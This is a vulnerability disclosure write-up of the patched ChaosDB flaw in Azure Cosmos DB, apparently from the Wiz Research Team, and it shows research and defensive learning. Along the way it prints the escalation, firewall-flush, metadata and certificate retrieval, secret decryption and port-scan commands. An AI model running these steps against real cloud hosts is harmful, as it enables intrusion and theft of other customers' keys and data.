ChaosDB explained: Azure's Cosmos DB vulnerability walkthrough
This is the full story of the Azure ChaosDB Vulnerability that was discovered and disclosed by the Wiz Research Team, where we were able to gain complete unrestricted access to the databases of several thousand Microsoft Azure customers. In August 2021, we disclosed to Microsoft a new vulnerability in Cosmos DB that ultimately allowed us to retrieve numerous internal keys that can be used to manage the service, following this high-level workflow:
Set up a Jupyter Notebook container on your Azure Cosmos DB
Run any C# code to obtain root privileges
Remove firewall rules set locally on the container in order to gain unrestricted network access
Query WireServer to obtain information about installed extensions, certificates and their corresponding private keys
Connect to the local Service Fabric, list all running applications, and obtain the Primary Key to other customers' databases
Access Service Fabric instances of multiple regions over the internet
In this post we walk you through every step of the way, to the point where we even gained administrative access to some of the magic that powers Azure.
What is Azure Cosmos DB?
Azure Cosmos DB is a fully managed NoSQL database for modern app development. Single-digit millisecond response times, with automatic and instant scalability, guarantee speed at any scale. Business continuity is assured with SLA-backed availability and enterprise-grade security.
Launched in May 2017, Cosmos DB is a globally distributed database solution used by high-profile customers, including many Fortune 500 companies (according to gotocosmos.com).
Cosmos DB can be accessed via API keys for reading, writing, and deleting operations, and its permissions can be managed by standard Azure IAM. To perform any operation on a Cosmos DB instance, you simply need to supply the Cosmos DB endpoint and an appropriate API key (Primary Key). The Primary Key for a Cosmos DB Account is the equivalent of the root password in traditional, on-premises databases.
What is Jupyter Notebook?
At the time of our research, Azure Cosmos DB instances came with an embedded Jupyter Notebook container: an open-source web application that allows you to create and share documents containing live code, equations, visualizations, and narrative text. Basically, it is a very cool way to present data using code.
The Jupyter Notebook container offers terminal access as well as the option to interact with your Cosmos DB instance using different programming languages (Python, C#, etc.). The credentials for the Cosmos DB account are pre-configured as environment variables of the container image, so the SDK can use them to access the account transparently.
Bug #1: Jupyter Notebook Local Privilege Escalation (LPE)
We knew that, by design, you could execute arbitrary code on Jupyter Notebook. A few minutes later, we had already gained root privileges. How?
When we used the embedded Jupyter terminal or the default Python3 Notebook, our code was being executed as the unprivileged, non-sudo'er user named cosmosuser. It seems that the service developers’ intention was that any code executed in this interface would be executed as cosmosuser.
However, when we executed some C# code, we noticed it was being executed with root privileges.
Yes, we were surprised as well.
It seems that every programming language the Jupyter Notebook supports has its own “host” process responsible for executing user-supplied code and communicating the output to the Web-UI. For some unknown reason, the host process for C# specifically was running with root privileges, which meant that any C# code would be executed as root as well. We used this misconfiguration to escalate our privileges inside the container: we appended a line to the /etc/passwd file, created a new user with uid=0 and gid=0, switched to this user using the su command, and were effectively granted root privileges inside the container. And if you are asking yourself why we wanted to obtain root privileges in the first place, the answer is very simple – we were curious about this environment: who owns it? Is it shared across users? We assumed that, as root, we might be able to answer some of our unanswered questions.
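For illustration, the container-side steps look roughly like the following shell sketch; the username and password are hypothetical placeholders, and the commands only succeed because they are launched from the root-privileged C# kernel:
# Generate a password hash and append a new user with uid=0 and gid=0 to /etc/passwd.
HASH=$(openssl passwd -1 'SomePassword1!')
echo "wizroot:${HASH}:0:0:root:/root:/bin/bash" >> /etc/passwd
# Switch to the new root-equivalent user (prompts for the password chosen above).
su wizroot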
Bug #2: Unrestricted Network Access
iptables -F was all it took.
After gaining root privileges we started poking around the container, and amongst other things, we issued the iptables command to view the local firewall rules determining which network resources we could, and more interestingly, could not, access.
Looking at the iptables rules, we found these supposedly forbidden addresses:
10.0.0.0/16 subnet, an internal subnet we were not familiar with
169.254.169.254, the Azure Instance Metadata Service address
168.63.129.16, another unfamiliar IP address
Why did the service developers configure these specific rules to prevent us from accessing these specific IP addresses? Good thing (or bad, depending whose side you are on) these firewall rules were configured locally on the container where we were currently running as root. So, we simply deleted the rules (by issuing iptables -F), clearing the way to these forbidden IP addresses and to some even more interesting findings.
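For reference, reproducing this from a root shell boils down to two commands (listing the rules first simply shows what is about to be removed):
# Inspect the container-local firewall rules, then flush them all.
iptables -L -n
iptables -F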
It is important to point out that, in our opinion, a safer approach would be to enforce these firewall rules outside the Jupyter Notebook container, where an attacker cannot bypass them even with root privileges.
Bug #3: Not the Certificate We Deserve, but the Certificate We Need
After the jailbreak that we achieved with the two previous bugs (Jupyter Notebook LPE and Unrestricted Network Access), we conducted some network recon that involved accessing the previously forbidden IP addresses. The way we saw it was that if the developers went through the trouble of explicitly attempting to prevent us from accessing these addresses, then we should most definitely go through the trouble of attempting to access them.
Accessing forbidden IP address #1 – IMDS
169.254.169.254 is the Azure Instance Metadata Service (IMDS). This service holds metadata about the currently running virtual machine instance, such as its storage, network configuration, and more. You simply send an HTTP request and retrieve information unique to that Virtual Machine (VM). We issued a request and discovered a couple of interesting things:
Our Azure environment was set to AzurePublicCloud, and our subscription ID was not a subscription that we owned.
Our osType was set to Windows, even though we were running Linux commands on a Linux terminal.
The reported IP address was in the 10.0.0.0/16 subnet – the same subnet we were not supposed to access according to the firewall rules we had just removed.
Putting these together, we realized we were not querying the Metadata Service of our container, but that of our HOST MACHINE, which seems to be hosted in some sort of a shared environment!
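For reference, the IMDS query itself is the standard instance-metadata call (the api-version shown is just one commonly supported value):
# Query the Azure Instance Metadata Service from inside the container.
curl -s -H "Metadata: true" \
     "http://169.254.169.254/metadata/instance?api-version=2020-06-01"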
Accessing forbidden IP address #2 – WireServer
After googling the IP address 168.63.129.16, we discovered that it is a virtual IP address that exists on every Azure VM and is referred to as the WireServer.
Microsoft offers almost no official documentation for WireServer. However, Paul Litvak from Intezer did an amazing job researching it! Check out his blog post regarding past vulnerabilities involving Azure WireServer.
We learned that WireServer manages aspects and features of VMs within Azure, and specifically the extensions of every Azure VM. Extensions are software applications that Azure manages, either first-party software like Azure’s log analytics agent, or third-party software that Azure supports like Datadog. Apparently, in order to install and configure these extensions, all Azure VMs come pre-installed with one of two agents, one for Windows and one for Linux. You can think of WireServer as the backend of these agents, used to supply any information the agent needs in order to function properly.
Going back to the WireServer agent for Linux, also known as the WA-Agent or WALinuxAgent, we realized it was an open-source project hosted on GitHub. So we delved into the source code to learn more about WireServer's functionality.
Understanding WireServer
WireServer can be queried using HTTP and has several endpoints that are interesting for our research purposes:
Goal State – essentially a phone book of endpoints that the agent needs to query in order to fetch different configuration settings. You can download any Azure VM's Goal State, and with it all the configuration endpoints specific to your virtual machine, by executing a simple cURL command, as can be seen in the snippet below this list.
ExtensionsConfig – as its name suggests, stores information about all the extensions installed on the VM. These configurations sometimes contain sensitive information such as hardcoded passwords or keys, and when they do, that information is stored encrypted.
Certificates – stores the encryption keys used to decrypt the encrypted segments of ExtensionsConfig.
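Here is roughly what that Goal State request looks like; the endpoint is the one the open-source Linux agent queries, while the exact x-ms-version value should be treated as an assumption:
# Fetch the underlying VM's Goal State from WireServer (the response is XML and includes,
# among other things, the per-VM ExtensionsConfig and Certificates URLs mentioned above).
curl -s -H "x-ms-version: 2012-11-30" \
     "http://168.63.129.16/machine/?comp=goalstate"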
To obtain information about our machine’s extensions, we first executed a cURL command to fetch the machine’s Goal State. The result was the underlying virtual machine Goal State, including its ExtensionsConfig URL, which we then also queried.
These extensions were most likely installed on our HOST, the Windows-based VM, and not our private Linux container. The next logical step was to extract information from these configurations and maybe uncover secrets we could later use for lateral movement within the Cosmos DB environment.
Retrieving decryption keys
Most extensions contain these two sections:
publicSettings – a plain-text section holding generic information about the VM extension and its settings.
protectedSettings – an encrypted section holding sensitive information about the VM extension.
Hardcoded credentials and/or sensitive info are supposed to be stored in the protectedSettings section of our extensions. So how does the agent decrypt this sensitive data? Where does it get the decryption key? The answer is the Certificates endpoint. But to retrieve the certificates for the decryption, the agent first needs to take an extra precaution and supply a self-signed transport certificate that would be used to encrypt the certificates bundle. Fortunately, this transport certificate is not validated by the server, meaning we can supply our own without relying on any certificate that has been previously generated by the host machine’s agent. The way to supply this public key is by including it in the x-ms-guest-agent-public-x509-cert header.
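A hedged sketch of that exchange, based on how the open-source Linux agent behaves: generate a throwaway transport certificate, then request the certificates blob. CERTS_URL stands for the Certificates URL taken from the Goal State response, and the exact header values are assumptions.
# Create a self-signed "transport" certificate; WireServer will encrypt the certificates bundle to it.
openssl req -x509 -nodes -newkey rsa:2048 -days 1 -subj "/CN=transport" \
        -keyout transport.key -out transport.crt
# Strip the PEM header/footer and newlines so the certificate fits into a single HTTP header value.
TRANSPORT_CERT=$(grep -v 'CERTIFICATE-----' transport.crt | tr -d '\n')
# CERTS_URL is the per-VM Certificates URL from the Goal State (placeholder, not reproduced here).
curl -s -H "x-ms-version: 2012-11-30" \
     -H "x-ms-guest-agent-public-x509-cert: ${TRANSPORT_CERT}" \
     "${CERTS_URL}"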
Up to this point, every time we had queried the Certificates endpoint (on any other service), we always retrieved the certificates encoded in the Pkcs7BlobWithPfxContents format. This is the certificate bundle, encrypted in such a way that only the private key matching the public key supplied in the x-ms-guest-agent-public-x509-cert header can decrypt it.
However, when we performed the exact same steps in the Jupyter Notebook environment, we retrieved the certificates encoded in another format – Certificates Bond Package.
This was the first time we had ever encountered this format. Unfortunately, the OpenSSL commands we were used to executing to decrypt the standard format did not work here. Time to up our game and try to decode this format!
Decoding Certificates Bond Package
Our search for the Certificates Bond Package format on Google did not yield an answer.
Where do we go from here? We decided to reverse engineer the clients of the WireServer, the VM agents. We assumed that if anything knew how to decode this format, it would be these agents that rely on this information to function properly.
Looking at the Linux agent first, we could not find any reference to the mysterious Certificate Bond Package format.
Moving on to investigate the Windows agent, we knew from the IMDS metadata that, even though we were running inside a Linux container, our host VM was a Windows VM. This meant that all responses from WireServer were meant to be handled by the Windows agent, not the Linux one. And this was the breakthrough we needed to continue.
Unlike the WA-Agent, the Windows virtual machine agent (WindowsAzureGuestAgent.exe) is not open source. But it is written in C#, so we could decompile it into something that resembles source code fairly easily. There are a number of tools that can do this; we chose ILSpy.
Browsing the decompiled assemblies, we started with Microsoft.WindowsAzure.RoleContainer.dll and then moved on to Microsoft.WindowsAzure.Security.CredentialsManagement.Package.dll, both part of WindowsAzureGuestAgent.exe.
And there you have it! Finally, we have our first reference to the elusive CertificatesBondPackage format, along with its handling code.
Using existing functionality of the Windows agent, we wrote a simple snippet that mimics the agent's decoding of the Certificates Bond Package, in order to obtain the keys in the familiar PKCS#7 format:
using Microsoft.Cis.Fabric.CertificateServices;
using Microsoft.WindowsAzure.GuestAgent.CertificateManager;
using Microsoft.WindowsAzure.Security.CredentialsManagement.Package;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading.Tasks;
using Bond.IO;
using Bond.IO.Unsafe;
using RD.Security.Dsms;
using Bond;
using Bond.Protocols;
namespace ConsoleApp2
{
    class Program
    {
        static void Main(string[] args)
        {
            // Read the raw Certificates Bond Package retrieved from WireServer.
            byte[] cert = File.ReadAllBytes(@"certificate_bond.bin");

            // Deserialize the Bond compact-binary package and extract the managed certificates blob.
            InputBuffer input = new InputBuffer(cert);
            ManagedCertificatesPackage managedCertsData =
                Deserialize<SecretsPackage>.From(new CompactBinaryReader<InputBuffer>(input, 1)).ManagedCertsPackage;
            var managedCertData = managedCertsData.CertsData;
            byte[] array = new byte[managedCertData.Count];
            Array.Copy(managedCertData.Array, managedCertData.Offset, array, 0, managedCertData.Count);
            File.WriteAllBytes(@"ManagedCertsPackage.bin", array);

            // Deserialize again and extract the unmanaged certificates blob.
            InputBuffer input2 = new InputBuffer(cert);
            ArraySegment<byte> unmanagedCertsData =
                Deserialize<SecretsPackage>.From(new CompactBinaryReader<InputBuffer>(input2, 1)).UnmanagedCertsData;
            byte[] array2 = new byte[unmanagedCertsData.Count];
            Array.Copy(unmanagedCertsData.Array, unmanagedCertsData.Offset, array2, 0, unmanagedCertsData.Count);
            File.WriteAllBytes(@"UnmanagedCertsData.bin", array2);
        }
    }
}
Now, after decoding and decrypting the Certificate Bond Package, we expected to get two keys: a private key and a public key used to encrypt and decrypt the protected settings.
In reality, we got back 25 keys.
Yes, 25 Microsoft certificates AND their corresponding private keys.
The Certificates Bond Package contained a bunch of certificates we probably shouldn’t have had; we will take a closer look at these three:
fabricsecrets.documents.azure.com
fabric.westus1.cosmos.azure.com
*.notebook.cosmos.azure.com (this alone allows us to intercept encrypted SSL traffic of customers' Jupyter Notebooks running on the HOST Windows VM...)
What is the legitimate purpose for these certificates?
Accessing Storage Accounts and Internal Service Fabric
Going back to ExtensionsConfig, we realized the ServiceFabricNode extension had some interesting information in its publicSettings: it contained the cluster endpoint of the machine's Service Fabric cluster, along with the common name of the certificate required for authentication.
When we accessed the clusterEndpoint URL from Google Chrome, we were prompted to supply a client certificate for authentication. We concluded that our best bet would be to use the fabric.westus1.cosmos.azure.com certificate we had obtained earlier from WireServer, since it was mentioned in the publicSettings of the ServiceFabricNode extension.
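Outside the browser, the same client-certificate authentication can be reproduced with cURL. This is a sketch only: the endpoint placeholder comes from the extension's publicSettings, and the certificate and key file names are hypothetical.
# Authenticate to the cluster endpoint with the fabric.westus1.cosmos.azure.com client certificate.
curl -sk --cert fabric-westus1.pem --key fabric-westus1.key \
     "https://<clusterEndpoint>"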
What we got back was a huge XML-formatted manifest file with lots of cluster information, including multiple connection strings to multiple Azure Storage Accounts that could be accessed with the Storage Account Keys found in the decrypted protectedSettings section of our ExtensionsConfig.
For future reference, these are the OpenSSL commands we used to decrypt the protectedSettings section:
user@laptop:~/cosmos$ ls -la
total 144
drwxr-xr-x 2 user user 4096 Aug 9 20:37 .
drwxr-xr-x 3 user user 4096 Aug 9 19:53 ..
-rw------- 1 user user 121900 Aug 9 18:32 ManagedCertificates.pem
-rw------- 1 user user 3144 Aug 9 18:35 UnmanagedCertificates.pem
user@laptop:~/cosmos$ cat UnmanagedCertificates.pem | sed -n '/-----BEGIN PRIVATE KEY-----$/,/^-----END PRIVATE KEY-----$/p' > protected-key.pem
user@laptop:~/cosmos$ cat UnmanagedCertificates.pem | sed -n '/-----BEGIN CERTIFICATE-----$/,/^-----END CERTIFICATE-----$/p' > protected-cert.pem
user@laptop:~/cosmos$ echo MIIB0AYJKoZIhvcN...redacted...pqF8om/4fhhMgqGpu | base64 -d | openssl smime -inform DER -decrypt -recip protected-cert.pem -inkey protected-key.pem
{"Placeholder":"NothingImportant"}
user@laptop:~/cosmos$ echo MIICkwYJKoZIhvcN...redacted...pMd+kxSTnWwJLOwgl | base64 -d | openssl smime -inform DER -decrypt -recip protected-cert.pem -inkey protected-key.pem
{"StorageAccountKey1":"55410uWV0y5X...redacted...XCUEN2upGg==","StorageAccountKey2":"kNY61/TqYr4r...redacted...KOvBat3NbQ=="}
We accessed these storage accounts using Azure Storage Explorer and found hundreds of gigabytes of metadata and operational logs, as well as millions of records about Cosmos DB's underlying infrastructure.
We then noticed a section in the manifest.xml file describing the Service Fabric nodes and their addresses.
If you've been paying close attention so far, you'd recall that our jailbreak included removing the local iptables rules that prevented us from accessing the 10.0.0.0/16 subnet – the very subnet in which these Service Fabric nodes live. This meant we could now reach them freely. It also meant we could access the local Service Fabric HttpGatewayEndpoint on port 19080 from our Jupyter Notebook container, which, as the manifest file suggests, could be authenticated to using fabric.westus1.cosmos.azure.com.
Now would be a good time to pause and ask: what is Service Fabric, anyway? According to Microsoft's documentation, Azure Service Fabric is a distributed systems platform that makes it easy to package, deploy, and manage scalable and reliable microservices and containers. So, we can treat it as an alternative to Kubernetes. Good.
Listing the applications
We connected and authenticated to our local Service Fabric endpoint on port 19080 with the fabric.westus1.cosmos.azure.com certificate, using the sfctl command-line tool. We then ran the sfctl application list command to list the running application instances.
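In practice those two steps look roughly like this; the endpoint is a placeholder and the certificate and key file names are hypothetical, while cluster select and application list are sfctl's standard commands:
# Point sfctl at the regional cluster and authenticate with the client certificate obtained from WireServer.
sfctl cluster select --endpoint https://<cluster-endpoint>:19080 \
      --cert fabric-westus1.pem --key fabric-westus1.key --no-verify
# List every application instance managed by the cluster.
sfctl application list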
The output gave us a list of all the Cosmos DB instances (more than 500!) managed by this regional cluster, including those that did not belong to our account.
Going over the output of the executed command, we thought these fields were particularly interesting:
COSMOSDB_ACCOUNT_KEY_ENCRYPTED
NOTEBOOK_AUTH_TOKEN_ENCRYPTED
NOTEBOOK_STORAGE_ACCOUNT_KEY_ENCRYPTED
Even though these secrets were encrypted (as their names suggest), we had the certificate required for decryption: fabricsecrets.documents.azure.com.
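The decryption itself should look much like the protectedSettings decryption shown earlier. A minimal sketch, assuming the secrets are base64-encoded PKCS#7/CMS blobs enveloped to the fabricsecrets certificate, and using hypothetical file names:
# Decrypt an encrypted secret (e.g. COSMOSDB_ACCOUNT_KEY_ENCRYPTED) with the
# fabricsecrets.documents.azure.com certificate and private key extracted earlier.
echo "<base64-encrypted-secret>" | base64 -d | \
    openssl smime -inform DER -decrypt -recip fabricsecrets-cert.pem -inkey fabricsecrets-key.pem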
Using the information we obtained by taking advantage of the misconfigurations described above, we were able to:
Obtain the plaintext Primary Key for any Cosmos DB instance running in our cluster, granting us the ability to query and manipulate customers' databases without any authorization. This can be done by decrypting COSMOSDB_ACCOUNT_KEY_ENCRYPTED with the certificate for fabricsecrets.documents.azure.com.
Obtain the plaintext auth token for any Jupyter Notebook instance running in our cluster, granting us the ability to execute arbitrary code on customers' Jupyter VMs without any authorization. This can be done by decrypting NOTEBOOK_AUTH_TOKEN_ENCRYPTED with the certificate for fabricsecrets.documents.azure.com, and accessing the Jupyter Notebook located at NOTEBOOK_PROXY_PATH.
Obtain plaintext passwords for customers' notebook storage accounts, granting us the ability to access and manipulate customers' private saved notebooks. This can be done by decrypting NOTEBOOK_STORAGE_ACCOUNT_KEY_ENCRYPTED with the certificate for fabricsecrets.documents.azure.com, and using the information in NOTEBOOK_STORAGE_FILE_ENDPOINT with Azure Storage Explorer.
Obtain the certificate for *.notebook.cosmos.azure.com, granting us the ability to intercept SSL traffic to these endpoints.
Obtain metadata about the underlying infrastructure of Cosmos DB by accessing internal Azure storage blobs.
Access the underlying infrastructure of Cosmos DB by browsing to Service Fabric Explorer located on various endpoints and authenticating with fabric.westus1.cosmos.azure.com.
Accessing the Infrastructure Externally
Earlier, we mentioned multiple Azure Storage Accounts containing metadata about the underlying infrastructure of Cosmos DB. After reviewing these log files, we noticed that some of them contained information about public Service Fabric instances that were supposedly accessible from the internet (as opposed to the LAN access required earlier).
We performed a network scan for port 19080 across Microsoft's ASN and found more than 100 Service Fabric instances accessible on this port. We attempted to connect to each of these Service Fabric instances using the certificate we had obtained earlier (fabric.westus1.cosmos.azure.com) and, to our surprise, the authentication was successful!
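A hedged sketch of that scan and the follow-up authentication attempt; the address ranges are intentionally omitted, and the host and file names are placeholders:
# Scan candidate address ranges for the Service Fabric HTTP gateway port.
masscan -p19080 <microsoft-announced-prefixes> --rate 10000 -oL sf-candidates.txt
# Try the regional certificate against a discovered endpoint; reaching Service Fabric Explorer
# confirms that the client certificate was accepted.
curl -sk --cert fabric-westus1.pem --key fabric-westus1.key \
     "https://<candidate-host>:19080/Explorer"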
Using just one certificate, we managed to authenticate to internal Service Fabric instances of multiple regions that were accessible from the internet.
Our network scan also yielded a partial list of these Service Fabric instances, spanning multiple regions.
Conclusion
We managed to gain unauthorized access to customers’ Azure Cosmos DB instances by taking advantage of a chain of misconfigurations in the Jupyter Notebook Container feature of Cosmos DB. We were able to prove access to thousands of companies’ Cosmos DB Instances (database, notebook environment, notebook storage) with full admin control via multiple authentication tokens and API keys. Among the affected customers are many Fortune 500 companies. We also managed to gain access to the underlying infrastructure that runs Cosmos DB and we were able to prove that this access can be maintained outside of the vulnerable application—over the internet. Overall, we think that this is as close as it gets to a “Service Takeover”.
Disclosure Timeline
August 09 2021 - Wiz Research Team first exploited the bug and gained unauthorized access to Cosmos DB accounts.
August 11 2021 - Wiz Research Team confirmed intersection with Wiz customers.
August 12 2021 - Wiz Research Team sent the advisory to Microsoft.
August 14 2021 - Wiz Research Team observed that the vulnerable feature had been disabled.
August 16 2021 - Microsoft Security Response Center (MSRC) confirmed the reported behavior (MSRC Case 66805).
August 16 2021 - Wiz Research Team observed that some of the obtained credentials had been revoked.
August 17 2021 - MSRC awarded a $40,000 bounty for the report.
August 23 2021 - MSRC confirmed that several thousand customers were affected.
August 23 2021 - MSRC and Wiz Research Team discussed public disclosure strategy.
August 25 2021 - Public disclosure.
Stay in touch!
Hi there! We are Nir Ohfeld and Sagi Tzadik from the Wiz Research Team. We are both veteran Black Hat speakers and white-hat hackers, but first and foremost two very good friends who, in our spare time, save the world from cloud vulnerabilities 😊 A little about us: Nir was recently ranked 3rd on the MSRC 2021 Q3 Security Researcher Leaderboard, while Sagi constantly comes up with new ideas and endless creativity when it comes to game-hacking and reverse-engineering.
We’d love to hear from you!
Follow us on Twitter (@sagitz_ & @nirohfeld) and subscribe to our blog. We have plenty of surprises in the pipeline!